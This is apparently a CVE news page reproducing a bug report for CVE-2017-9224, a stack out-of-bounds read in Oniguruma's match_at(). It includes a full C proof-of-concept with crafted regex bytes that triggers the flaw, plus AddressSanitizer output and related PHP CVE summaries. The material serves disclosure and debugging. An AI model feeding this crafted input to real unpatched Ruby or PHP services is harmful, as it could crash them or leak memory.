Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2017-9224: Buffer Overflow in match_at() · Issue #57 · kkos/oniguruma

An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.

CVE
#linux#php#c++#buffer_overflow#ruby

The buffer-overflow is found with the code:

#include <stdio.h> #include “oniguruma.h”

static int search(regex_t* reg, unsigned char* str, unsigned char* end) { int r; unsigned char *start, *range; OnigRegion *region;

region = onig_region_new();

start = str; range = end; r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE); if (r >= 0) { int i;

fprintf(stderr, "match at %d  (%s)\\n", r,
        ONIGENC\_NAME(onig\_get\_encoding(reg)));
for (i = 0; i < region->num\_regs; i++) {
  fprintf(stderr, "%d: (%d\-%d)\\n", i, region->beg\[i\], region->end\[i\]);
}

} else if (r == ONIG_MISMATCH) { fprintf(stderr, "search fail (%s)\n", ONIGENC_NAME(onig_get_encoding(reg))); } else { /* error */ char s[ONIG_MAX_ERROR_MESSAGE_LEN]; onig_error_code_to_str(s, r); fprintf(stderr, "ERROR: %s\n", s); fprintf(stderr, " (%s)\n", ONIGENC_NAME(onig_get_encoding(reg))); return -1; }

onig_region_free(region, 1 /* 1:free self, 0:free contents only */); return 0; } static int exec(OnigEncoding enc, OnigOptionType options, char* apattern, char* apttern_end, char* astr, char* end) { int r; regex_t* reg; OnigErrorInfo einfo; UChar* pattern = (UChar* )apattern; UChar* str = (UChar* )astr;

onig_initialize(&enc, 1);

r = onig_new(&reg, pattern, apttern_end, options, enc, ONIG_SYNTAX_DEFAULT, &einfo); if (r != ONIG_NORMAL) { char s[ONIG_MAX_ERROR_MESSAGE_LEN]; onig_error_code_to_str(s, r, &einfo); fprintf(stderr, "ERROR: %s\n", s); return -1; }

r = search(reg, str, end);

onig_free(reg); onig_end(); return 0; } int main() { regex_t *reg; unsigned char str[] = { 0xc7, 0xd6, 0xfe, 0xea, 0xe0, 0xe2, 0x00 }; unsigned char input[] = {0xf1, 0x5c, 0x69, 0x53, 0x53, 0x53, 0x53, 0x3c, 0x30, 0x53, 0x59, 0x54, 0x52, 0x33, 0x7c, 0x2e, 0x5c, 0xe2, 0x48, 0x5c, 0x7a, 0x53, 0x00, 0x06, 0x00, 0x00, 0x27, 0x19, 0x00, 0x54, 0x52, 0x54, 0x52, 0x33, 0x7c, 0x2e, 0x53, 0xe2, 0x48}; int r = exec( ONIG_ENCODING_SJIS ,ONIG_OPTION_IGNORECASE , (char*)input,input+39, (char*) str,str+7 ); return 0; }

The asan err can be found as follows:

==4064==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdd18d5447 at pc 0x00000044434c bp 0x7ffdd18d4910 sp 0x7ffdd18d4900
READ of size 1 at 0x7ffdd18d5447 thread T0
    #0 0x44434b in match_at /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:1481
    #1 0x457fdf in onig_search /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:3651
    #2 0x401148 in search /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:18
    #3 0x401786 in exec /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:65
    #4 0x401a02 in main /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:77
    #5 0x7f9bd023582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #6 0x400f68 in _start (/home/xie/Downloads/oni/oni-asan-dev/test/testc+0x400f68)

Address 0x7ffdd18d5447 is located in stack of thread T0 at offset 39 in frame
    #0 0x40186f in main /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:71

  This frame has 2 object(s):
    [32, 39) 'str' <== Memory access at offset 39 overflows this variable
    [96, 135) 'input'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:1481 match_at
Shadow bytes around the buggy address:
  0x10003a312a30: 00 00 00 00 00 00 00 00 00 00 00 02 f3 f3 f3 f3
  0x10003a312a40: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003a312a50: 00 00 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2
  0x10003a312a60: 00 00 00 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x10003a312a70: 00 00 00 02 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
=>0x10003a312a80: 00 00 00 00 f1 f1 f1 f1[07]f4 f4 f4 f2 f2 f2 f2
  0x10003a312a90: 00 00 00 00 07 f4 f4 f4 f3 f3 f3 f3 00 00 00 00
  0x10003a312aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003a312ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003a312ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003a312ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==4064==ABORTING

Related news

CVE-2016-5771: PHP: PHP 5 ChangeLog

spl_array.c in the SPL extension in PHP before 5.5.37 and 5.6.x before 5.6.23 improperly interacts with the unserialize implementation and garbage collection, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and application crash) via crafted serialized data.

CVE-2016-4343: PHP: PHP 7 ChangeLog

The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.

CVE-2014-3479: PHP: PHP 5 ChangeLog

The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907